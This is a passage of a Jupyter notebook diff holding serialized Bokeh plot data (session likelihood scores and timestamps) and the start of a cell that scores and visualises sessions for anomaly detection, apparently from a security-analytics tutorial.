'c:/windows/system32/ntoskrnl.exe'})\"]],\"rarest_window3_likelihood\":{\"__ndarray__\":\"BTiHFscb1T4avl/icajlPggrcz1z6tU+HmGy0aYs8z5mX5uTglfGPvATKaOzKIM+8flCAyBMgT4gtP4jvQyWPpQsTjSJS6g+gba83xtf0D4eYbLRpizzPgy9DZbFH5g+sjn/naGRoD6OyTVfYffFPo6J1xg0gKQ+sjn/naGRoD4TbPfvaOWVPsgZ5aAA/Mo+wxMwkW7jgT7wbbYebUmXPo6J1xg0gKQ+y5Du9xKL6D4bOtwXlmp0Pm2YOt6PvNM+lCxONIlLqD5tmDrej7zTPls6CuhB05Q+yYjiK0LA4D7e+6WkNcWgPkyXBgHRZos+1OFUJwmRAT9EtFlBB07BPlcJ5lEBWjI/VwnmUQFaMj9XCeZRAVoyP1cJ5lEBWjI/HmGy0aYs8z6zx5zL/BcTP1cJ5lEBWjI/VwnmUQFaMj+zx5zL/BcTP1cJ5lEBWjI/s8ecy/wXEz9XCeZRAVoyP7PHnMv8FxM/l7etNaNACD/LkO73EovoPrCZy7ZBXxs/+1fJHTigAj8EHGo8vAT6Po2wOnlzMfk+atLYO4FXDD8EHGo8vAT6Ph5hstGmLPM+emGJGNt5DT+wmcu2QV8bP7CZy7ZBXxs/NdJ+47XI7T5FXkOOyEL+Plo+HGMAyAA/rizbnwdAAD8gjUlcwHL6PvtXyR04oAI/y5Du9xKL6D5IaE5EbuH2PsGPbln9zgo/OdnjEdeNBj9u7FwuKo3qPh5hstGmLPM+sJnLtkFfGz8kOm2CmnQOP+ZBeh8VIfw+rvlet3stAz9ybnzOzNrzPu0eXs/m0Ao/y5Du9xKL6D5XZ9EogvX6Po0hWfSgEA0/NdJ+47XI7T7Bc1cDsR8GPy9b0qRC+g8/7R5ez+bQCj9q0tg7gVcMP8uQ7vcSi+g+GXTbySjIAT+uLNufB0AAP0VeQ47IQv4+Ib8lAM6N/z5aPhxjAMgAP+8XZE/F6PY+HmGy0aYs8z6uLNufB0AAP/tXyR04oAI/cm58zsza8z6wmcu2QV8bP2rS2DuBVww/AMlvzEgZ9z56YYkY23kNP7N7gQET5wk/7xdkT8Xo9j7Lz0/OALDxPsuQ7vcSi+g+2TJU8N1XED+uLNufB0AAP8uQ7vcSi+g+RV5DjshC/j4ehh/ukl3wPgaWG1eZtvs+sJnLtkFfGz/7V8kdOKACPx5hstGmLPM+NdJ+47XI7T6wmcu2QV8bP3cr3TewCQs/HCt7T6/6Az8mUw+ekCf5PiCNSVzAcvo+djJg0zaqGD92MmDTNqoYP3YyYNM2qhg/djJg0zaqGD+aFlwhZkQVP5oWXCFmRBU/mhZcIWZEFT+aFlwhZkQVP3YyYNM2qhg/mhZcIWZEFT92MmDTNqoYP5oWXCFmRBU/djJg0zaqGD92MmDTNqoYP5oWXCFmRBU/mhZcIWZEFT92MmDTNqoYP3YyYNM2qhg/mhZcIWZEFT92MmDTNqoYP3YyYNM2qhg/mhZcIWZEFT+aFlwhZkQVP5oWXCFmRBU/djJg0zaqGD8ak6U4x04YP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCP9Ruw1qtCYI/1G7DWq0Jgj/UbsNarQmCPxjj5GrptnI+8PIRLRDbeD/w8hEtENt4P/DyES0Q23g/8PIRLRDbeD/w8hEtENt4P/DyES0Q23g/8PIRLRDbeD/w8hEtENt4P/DyES0Q23g/8PIRLRDbeD/w8hEtENt4P/DyES0Q23g/8PIRLRDbeD/w8hEtENt4P/DyES0Q23g/8PIRLRDbeD/w8hEtENt4P/DyES0Q23g/8PIRLRDbeD/w8hEtENt4P/DyES0Q23g/8PIRLRDbeD/w8hEtENt4P/DyES0Q23g/8PIRLRDbeD/w8hEtENt4P/DyES0Q23g/8PIRLRDbeD/w8hEtENt4P/DyES0Q23g/8PIRLRDbeD/w8hEtENt4P/DyES0Q23g/8PIRLRDbeD/w8hEtENt4P/DyES0Q23g/8PIRLRDbeD/w8hEtENt4P/DyES0Q23g/8PIRLRDbeD8=\",\"dtype\":\"float64\",\"shape\":[352]},\"time_col\":[\"2020-05-21 18:14:15.389000+00:00\",\"2020-05-21 19:15:15.392000+00:00\",\"2020-05-21 20:15:15.397000+00:00\",\"2020-05-21 20:52:15.398000+00:00\",\"2020-05-21 21:13:15.401000+00:00\",\"2020-05-21 22:15:15.399000+00:00\",\"2020-05-21 23:15:15.401000+00:00\",\"2020-05-22 00:15:15.414000+00:00\",\"2020-05-22 01:15:15.409000+00:00\",\"2020-05-22 02:15:15.414000+00:00\",\"2020-05-22 02:49:15.415000+00:00\",\"2020-05-22 03:15:15.415000+00:00\",\"2020-05-22 04:15:15.404000+00:00\",\"2020-05-22 05:15:15.419000+00:00\",\"2020-05-22 06:13:15.420000+00:00\",\"2020-05-22 07:15:15.420000+00:00\",\"2020-05-22 08:15:15.420000+00:00\",\"2020-05-22 09:13:15.423000+00:00\",\"2020-05-22 10:15:15.431000+00:00\",\"2020-05-22 11:15:15.432000+00:00\",\"2020-05-22 12:15:15.439000+00:00\",\"2020-05-22 13:03:15.433000+00:00\",\"2020-05-22 13:14:15.441000+00:00\",\"2020-05-22 14:15:15.434000+00:00\",\"2020-05-22 15:15:15.439000+00:00\",\"2020-05-22 16:15:15.443000+00:00\",\"2020-05-22 17:14:15.454000+00:00\",\"2020-05-22 17:53:15.446000+00:00\",\"2020-05-22 18:15:15.456000+00:00\",\"2020-05-22 19:15:15.452000+00:00\",\"2020-05-22 23:25:00.020000+00:00\",\"2020-05-23 01:01:00.020000+00:00\",\"2020-05-23 01:34:00.018000+00:00\",\"2020-05-23 02:34:00.030000+00:00\",\"2020-05-23 03:34:00.030000+00:00\",\"2020-05-23 04:34:00.030000+00:00\",\"2020-05-23 05:23:00.040000+00:00\",\"2020-05-23 05:34:00.035000+00:00\",\"2020-05-23 06:34:00.035000+00:00\",\"2020-05-23 07:34:00.040000+00:00\",\"2020-05-23 08:34:00.045000+00:00\",\"2020-05-23 09:34:00.050000+00:00\",\"2020-05-23 10:34:00.047000+00:00\",\"2020-05-23 11:34:00.050000+00:00\",\"2020-05-23 12:34:00.055000+00:00\",\"2020-05-23 13:01:00.053000+00:00\",\"2020-05-23 13:20:00.055000+00:00\",\"2020-05-23 13:34:00.056000+00:00\",\"2020-05-23 14:34:00.056000+00:00\",\"2020-05-23 15:34:00.061000+00:00\",\"2020-05-23 16:34:00.064000+00:00\",\"2020-05-23 17:34:00.072000+00:00\",\"2020-05-23 18:34:00.075000+00:00\",\"2020-05-23 18:56:00.070000+00:00\",\"2020-05-23 19:34:00.072000+00:00\",\"2020-05-23 20:34:00.080000+00:00\",\"2020-05-23 21:34:00.080000+00:00\",\"2020-05-23 22:34:00.080000+00:00\",\"2020-05-23 23:34:00.085000+00:00\",\"2020-05-24 00:34:00.085000+00:00\",\"2020-05-24 01:34:00.085000+00:00\",\"2020-05-24 02:34:00.089000+00:00\",\"2020-05-24 03:34:00.095000+00:00\",\"2020-05-24 03:37:00.116000+00:00\",\"2020-05-24 04:34:00.096000+00:00\",\"2020-05-24 05:34:00.107000+00:00\",\"2020-05-24 06:34:00.105000+00:00\",\"2020-05-24 07:34:00.105000+00:00\",\"2020-05-24 07:44:00.105000+00:00\",\"2020-05-24 08:34:00.104000+00:00\",\"2020-05-24 09:34:00.110000+00:00\",\"2020-05-24 10:34:00.110000+00:00\",\"2020-05-24 11:34:00.115000+00:00\",\"2020-05-24 12:34:00.120000+00:00\",\"2020-05-24 13:34:00.120000+00:00\",\"2020-05-24 14:05:00.125000+00:00\",\"2020-05-24 14:34:00.126000+00:00\",\"2020-05-24 15:34:00.125000+00:00\",\"2020-05-24 16:34:00.130000+00:00\",\"2020-05-24 17:34:00.134000+00:00\",\"2020-05-24 18:34:00.132000+00:00\",\"2020-05-24 19:34:00.133000+00:00\",\"2020-05-24 20:34:00.138000+00:00\",\"2020-05-24 20:49:00.142000+00:00\",\"2020-05-24 21:34:00.139000+00:00\",\"2020-05-24 22:34:00.141000+00:00\",\"2020-05-24 23:34:00.145000+00:00\",\"2020-05-25 00:34:00.146000+00:00\",\"2020-05-25 01:34:00.153000+00:00\",\"2020-05-25 02:34:00.151000+00:00\",\"2020-05-25 03:01:00.156000+00:00\",\"2020-05-25 03:34:00.155000+00:00\",\"2020-05-25 04:34:00.165000+00:00\",\"2020-05-25 05:34:00.160000+00:00\",\"2020-05-25 06:34:00.161000+00:00\",\"2020-05-25 07:34:00.163000+00:00\",\"2020-05-25 08:34:00.170000+00:00\",\"2020-05-25 09:34:00.169000+00:00\",\"2020-05-25 10:34:00.174000+00:00\",\"2020-05-25 11:34:00.174000+00:00\",\"2020-05-25 12:34:00.180000+00:00\",\"2020-05-25 12:52:00.181000+00:00\",\"2020-05-25 13:34:00.185000+00:00\",\"2020-05-25 14:34:00.185000+00:00\",\"2020-05-25 14:38:00.185000+00:00\",\"2020-05-25 15:34:00.185000+00:00\",\"2020-05-25 16:34:00.191000+00:00\",\"2020-05-25 17:34:00.192000+00:00\",\"2020-05-25 18:34:00.199000+00:00\",\"2020-05-25 19:34:00.202000+00:00\",\"2020-05-25 20:29:00.204000+00:00\",\"2020-05-25 20:34:00.210000+00:00\",\"2020-05-25 21:34:00.203000+00:00\",\"2020-05-25 22:34:00.206000+00:00\",\"2020-05-25 23:34:00.218000+00:00\",\"2020-05-26 00:34:00.214000+00:00\",\"2020-05-26 01:34:00.221000+00:00\",\"2020-05-21 18:31:11.271000+00:00\",\"2020-05-21 19:31:11.310000+00:00\",\"2020-05-21 20:31:11.339000+00:00\",\"2020-05-21 21:31:11.373000+00:00\",\"2020-05-21 22:31:11.411000+00:00\",\"2020-05-21 23:31:11.452000+00:00\",\"2020-05-22 00:31:11.477000+00:00\",\"2020-05-22 01:31:11.517000+00:00\",\"2020-05-22 02:31:11.555000+00:00\",\"2020-05-22 03:31:11.583000+00:00\",\"2020-05-22 04:31:11.620000+00:00\",\"2020-05-22 05:31:11.660000+00:00\",\"2020-05-22 06:31:11.700000+00:00\",\"2020-05-22 07:31:11.727000+00:00\",\"2020-05-22 08:31:11.767000+00:00\",\"2020-05-22 09:31:11.800000+00:00\",\"2020-05-22 10:31:11.833000+00:00\",\"2020-05-22 11:31:11.870000+00:00\",\"2020-05-22 12:31:11.908000+00:00\",\"2020-05-22 13:31:11.958000+00:00\",\"2020-05-22 14:31:11.982000+00:00\",\"2020-05-22 15:31:12.021000+00:00\",\"2020-05-22 16:31:12.046000+00:00\",\"2020-05-22 17:31:12.089000+00:00\",\"2020-05-22 18:31:12.126000+00:00\",\"2020-05-28 07:30:32.903000+00:00\",\"2020-05-21 18:31:11.271000+00:00\",\"2020-05-21 19:31:11.310000+00:00\",\"2020-05-21 20:31:11.339000+00:00\",\"2020-05-21 21:31:11.373000+00:00\",\"2020-05-21 22:31:11.411000+00:00\",\"2020-05-21 23:31:11.452000+00:00\",\"2020-05-22 00:31:11.477000+00:00\",\"2020-05-22 01:31:11.517000+00:00\",\"2020-05-22 02:31:11.555000+00:00\",\"2020-05-22 03:31:11.583000+00:00\",\"2020-05-22 04:31:11.620000+00:00\",\"2020-05-22 05:31:11.660000+00:00\",\"2020-05-22 06:31:11.700000+00:00\",\"2020-05-22 07:31:11.727000+00:00\",\"2020-05-22 08:31:11.767000+00:00\",\"2020-05-22 09:31:11.800000+00:00\",\"2020-05-22 10:31:11.833000+00:00\",\"2020-05-22 11:31:11.870000+00:00\",\"2020-05-22 12:31:11.908000+00:00\",\"2020-05-22 13:31:11.958000+00:00\",\"2020-05-22 14:31:11.982000+00:00\",\"2020-05-22 15:31:12.021000+00:00\",\"2020-05-22 16:31:12.046000+00:00\",\"2020-05-22 17:31:12.089000+00:00\",\"2020-05-22 18:31:12.126000+00:00\",\"2020-05-22 19:31:12.151000+00:00\",\"2020-05-22 20:31:12.196000+00:00\",\"2020-05-22 21:31:12.223000+00:00\",\"2020-05-22 22:31:12.269000+00:00\",\"2020-05-22 23:31:12.295000+00:00\",\"2020-05-23 00:31:12.338000+00:00\",\"2020-05-23 01:31:12.371000+00:00\",\"2020-05-23 02:31:12.415000+00:00\",\"2020-05-23 03:31:12.446000+00:00\",\"2020-05-23 04:31:12.483000+00:00\",\"2020-05-23 05:31:12.519000+00:00\",\"2020-05-23 06:31:12.559000+00:00\",\"2020-05-23 07:31:12.587000+00:00\",\"2020-05-23 08:31:12.629000+00:00\",\"2020-05-23 09:31:12.665000+00:00\",\"2020-05-23 10:31:12.701000+00:00\",\"2020-05-23 11:31:12.739000+00:00\",\"2020-05-23 12:31:12.765000+00:00\",\"2020-05-23 13:31:12.807000+00:00\",\"2020-05-23 14:31:12.844000+00:00\",\"2020-05-23 15:31:12.886000+00:00\",\"2020-05-23 16:31:12.928000+00:00\",\"2020-05-23 17:31:12.955000+00:00\",\"2020-05-23 18:31:12.987000+00:00\",\"2020-05-23 19:31:13.024000+00:00\",\"2020-05-23 20:31:13.059000+00:00\",\"2020-05-23 21:31:13.096000+00:00\",\"2020-05-23 22:31:13.127000+00:00\",\"2020-05-23 23:31:13.171000+00:00\",\"2020-05-24 00:31:13.214000+00:00\",\"2020-05-24 01:31:13.250000+00:00\",\"2020-05-24 02:31:13.281000+00:00\",\"2020-05-24 03:31:13.320000+00:00\",\"2020-05-24 04:31:13.359000+00:00\",\"2020-05-24 05:31:13.393000+00:00\",\"2020-05-24 06:31:13.427000+00:00\",\"2020-05-24 07:31:13.466000+00:00\",\"2020-05-24 08:31:13.494000+00:00\",\"2020-05-24 09:31:13.533000+00:00\",\"2020-05-24 10:31:13.575000+00:00\",\"2020-05-24 11:31:13.606000+00:00\",\"2020-05-24 12:31:13.647000+00:00\",\"2020-05-24 13:31:13.678000+00:00\",\"2020-05-24 14:31:13.714000+00:00\",\"2020-05-24 15:31:13.752000+00:00\",\"2020-05-24 16:31:13.789000+00:00\",\"2020-05-24 17:31:13.826000+00:00\",\"2020-05-24 18:31:13.863000+00:00\",\"2020-05-24 19:31:13.902000+00:00\",\"2020-05-24 20:31:13.933000+00:00\",\"2020-05-24 21:31:13.969000+00:00\",\"2020-05-24 22:31:14.011000+00:00\",\"2020-05-24 23:31:14.037000+00:00\",\"2020-05-25 00:31:14.079000+00:00\",\"2020-05-25 01:31:14.115000+00:00\",\"2020-05-25 02:31:14.150000+00:00\",\"2020-05-25 03:31:14.185000+00:00\",\"2020-05-25 04:31:14.224000+00:00\",\"2020-05-25 05:31:14.259000+00:00\",\"2020-05-25 06:31:14.297000+00:00\",\"2020-05-25 07:31:14.336000+00:00\",\"2020-05-25 08:31:14.360000+00:00\",\"2020-05-25 09:31:14.409000+00:00\",\"2020-05-25 10:31:14.431000+00:00\",\"2020-05-25 11:31:14.478000+00:00\",\"2020-05-25 12:31:14.505000+00:00\",\"2020-05-25 13:31:14.540000+00:00\",\"2020-05-25 14:31:14.579000+00:00\",\"2020-05-25 15:31:14.622000+00:00\",\"2020-05-25 16:31:14.660000+00:00\",\"2020-05-25 17:31:14.698000+00:00\",\"2020-05-25 18:31:14.728000+00:00\",\"2020-05-25 19:31:14.770000+00:00\",\"2020-05-25 20:31:14.803000+00:00\",\"2020-05-25 21:31:14.836000+00:00\",\"2020-05-25 22:31:14.871000+00:00\",\"2020-05-25 23:31:14.907000+00:00\",\"2020-05-26 00:31:14.949000+00:00\",\"2020-05-26 01:31:14.975000+00:00\",\"2020-05-26 02:31:15.017000+00:00\",\"2020-05-26 03:31:15.056000+00:00\",\"2020-05-26 04:31:15.089000+00:00\",\"2020-05-26 05:31:15.132000+00:00\",\"2020-05-26 06:31:15.158000+00:00\",\"2020-05-26 07:31:15.194000+00:00\",\"2020-05-26 08:31:15.237000+00:00\",\"2020-05-26 09:31:15.270000+00:00\",\"2020-05-26 10:31:15.305000+00:00\",\"2020-05-26 11:31:15.342000+00:00\",\"2020-05-26 12:31:15.377000+00:00\",\"2020-05-26 13:31:15.413000+00:00\",\"2020-05-26 14:31:15.448000+00:00\",\"2020-05-26 15:31:15.486000+00:00\",\"2020-05-26 16:31:15.522000+00:00\",\"2020-05-26 17:31:15.561000+00:00\",\"2020-05-26 18:31:15.596000+00:00\",\"2020-05-26 19:31:15.630000+00:00\",\"2020-05-26 20:31:15.676000+00:00\",\"2020-05-26 21:31:15.704000+00:00\",\"2020-05-26 22:31:15.740000+00:00\",\"2020-05-26 23:31:15.783000+00:00\",\"2020-05-27 00:31:15.816000+00:00\",\"2020-05-27 01:31:15.857000+00:00\",\"2020-05-27 02:31:15.886000+00:00\",\"2020-05-27 03:31:15.923000+00:00\",\"2020-05-27 04:31:15.959000+00:00\",\"2020-05-27 05:31:15.993000+00:00\",\"2020-05-27 06:31:16.029000+00:00\",\"2020-05-27 07:31:16.069000+00:00\",\"2020-05-27 08:31:16.104000+00:00\",\"2020-05-27 09:31:16.139000+00:00\",\"2020-05-27 10:31:16.172000+00:00\",\"2020-05-27 11:31:16.219000+00:00\",\"2020-05-27 12:31:16.248000+00:00\",\"2020-05-27 13:31:16.288000+00:00\",\"2020-05-27 14:31:16.319000+00:00\",\"2020-05-27 15:31:16.355000+00:00\",\"2020-05-27 16:31:16.396000+00:00\",\"2020-05-27 17:31:16.430000+00:00\",\"2020-05-27 18:31:16.465000+00:00\",\"2020-05-27 19:31:16.508000+00:00\",\"2020-05-27 20:31:16.541000+00:00\",\"2020-05-27 21:31:16.580000+00:00\",\"2020-05-27 22:31:16.619000+00:00\",\"2020-05-27 23:31:16.656000+00:00\",\"2020-05-28 00:31:16.692000+00:00\",\"2020-05-28 01:31:16.719000+00:00\",\"2020-05-28 02:31:16.763000+00:00\",\"2020-05-28 03:31:16.803000+00:00\",\"2020-05-28 04:31:16.838000+00:00\",\"2020-05-28 05:31:16.866000+00:00\",\"2020-05-28 06:31:16.903000+00:00\",\"2020-05-28 07:31:16.940000+00:00\",\"2020-05-28 08:31:16.974000+00:00\",\"2020-05-28 09:31:17.010000+00:00\",\"2020-05-28 10:31:17.049000+00:00\",\"2020-05-28 11:31:17.083000+00:00\",\"2020-05-28 12:31:17.121000+00:00\",\"2020-05-28 13:31:17.162000+00:00\",\"2020-05-28 14:31:17.195000+00:00\",\"2020-05-28 15:31:17.244000+00:00\",\"2020-05-28 16:31:17.270000+00:00\",\"2020-05-28 17:31:17.312000+00:00\",\"2020-05-26 06:00:06.813000+00:00\",\"2020-05-21 18:31:11.271000+00:00\",\"2020-05-21 19:31:11.310000+00:00\",\"2020-05-21 20:31:11.339000+00:00\",\"2020-05-21 21:31:11.373000+00:00\",\"2020-05-21 22:31:11.411000+00:00\",\"2020-05-21 23:31:11.452000+00:00\",\"2020-05-22 00:31:11.477000+00:00\",\"2020-05-22 01:31:11.517000+00:00\",\"2020-05-22 02:31:11.555000+00:00\",\"2020-05-22 03:31:11.583000+00:00\",\"2020-05-22 04:31:11.620000+00:00\",\"2020-05-22 05:31:11.660000+00:00\",\"2020-05-22 06:31:11.700000+00:00\",\"2020-05-22 07:31:11.727000+00:00\",\"2020-05-22 08:31:11.767000+00:00\",\"2020-05-22 09:31:11.800000+00:00\",\"2020-05-22 10:31:11.833000+00:00\",\"2020-05-22 11:31:11.870000+00:00\",\"2020-05-22 12:31:11.908000+00:00\",\"2020-05-22 13:31:11.958000+00:00\",\"2020-05-22 14:31:11.982000+00:00\",\"2020-05-22 15:31:12.021000+00:00\",\"2020-05-22 16:31:12.046000+00:00\",\"2020-05-22 17:31:12.089000+00:00\",\"2020-05-22 18:31:12.126000+00:00\",\"2020-05-22 19:30:48.734000+00:00\",\"2020-05-22 20:30:45.192000+00:00\",\"2020-05-22 21:30:45.369000+00:00\",\"2020-05-22 22:30:45.560000+00:00\",\"2020-05-22 23:30:45.750000+00:00\",\"2020-05-23 00:30:45.910000+00:00\",\"2020-05-23 01:30:46.111000+00:00\",\"2020-05-23 02:30:46.268000+00:00\",\"2020-05-23 03:30:46.448000+00:00\",\"2020-05-23 04:30:46.618000+00:00\",\"2020-05-23 05:30:46.805000+00:00\",\"2020-05-23 06:30:46.982000+00:00\",\"2020-05-23 07:30:47.162000+00:00\",\"2020-05-23 08:30:47.350000+00:00\",\"2020-05-23 09:31:12.665000+00:00\"],\"y_index\":[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]},\"selected\":{\"id\":\"2392\"},\"selection_policy\":{\"id\":\"2393\"}},\"id\":\"2337\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"2399\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"2312\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"2350\",\"type\":\"LinearScale\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"2401\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"2319\",\"type\":\"BasicTicker\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"2405\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"2308\",\"type\":\"DataRange1d\"},{\"attributes\":{\"data_source\":{\"id\":\"2362\"},\"glyph\":{\"id\":\"2364\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"2365\"},\"selection_glyph\":null,\"view\":{\"id\":\"2367\"}},\"id\":\"2366\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"2380\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"axis_label\":\"Event Time\",\"formatter\":{\"id\":\"2335\"},\"ticker\":{\"id\":\"2315\"}},\"id\":\"2314\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"2381\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"2400\",\"type\":\"DaysTicker\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"2383\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"2406\",\"type\":\"YearsTicker\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"2382\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"2404\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"2387\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"2310\",\"type\":\"LinearScale\"},{\"attributes\":{\"num_minor_ticks\":10,\"tickers\":[{\"id\":\"2380\"},{\"id\":\"2381\"},{\"id\":\"2382\"},{\"id\":\"2383\"},{\"id\":\"2384\"},{\"id\":\"2385\"},{\"id\":\"2386\"},{\"id\":\"2387\"},{\"id\":\"2388\"},{\"id\":\"2389\"},{\"id\":\"2390\"},{\"id\":\"2391\"}]},\"id\":\"2315\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"axis_label\":\"rarest_window3_likelihood\",\"formatter\":{\"id\":\"2378\"},\"ticker\":{\"id\":\"2319\"}},\"id\":\"2318\",\"type\":\"LinearAxis\"}],\"root_ids\":[\"2373\"]},\"title\":\"Bokeh Application\",\"version\":\"2.0.2\"}};\n",
+       "  var render_items = [{\"docid\":\"08f6b267-f6fd-4dc4-a443-1aabb22658f7\",\"root_ids\":[\"2373\"],\"roots\":{\"2373\":\"7e64b64a-2052-48e5-9106-abc7c48e5ba7\"}}];\n",
+       "  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n",
+       "\n",
+       "  }\n",
+       "  if (root.Bokeh !== undefined) {\n",
+       "    embed_document(root);\n",
+       "  } else {\n",
+       "    var attempts = 0;\n",
+       "    var timer = setInterval(function(root) {\n",
+       "      if (root.Bokeh !== undefined) {\n",
+       "        clearInterval(timer);\n",
+       "        embed_document(root);\n",
+       "      } else {\n",
+       "        attempts++;\n",
+       "        if (attempts > 100) {\n",
+       "          clearInterval(timer);\n",
+       "          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n",
+       "        }\n",
+       "      }\n",
+       "    }, 10, root)\n",
+       "  }\n",
+       "})(window);"
+      ],
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "2373"
+      }
+     },
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "# let's model and visualise these sessions in one go\n",
+    "\n",
+    "anomalous.score_and_visualise_sessions(\n",
+    "    data=data,\n",
+    "    session_column='param_session',\n",
+    "    window_length=3,\n",
+    "    time_column='begin',\n",
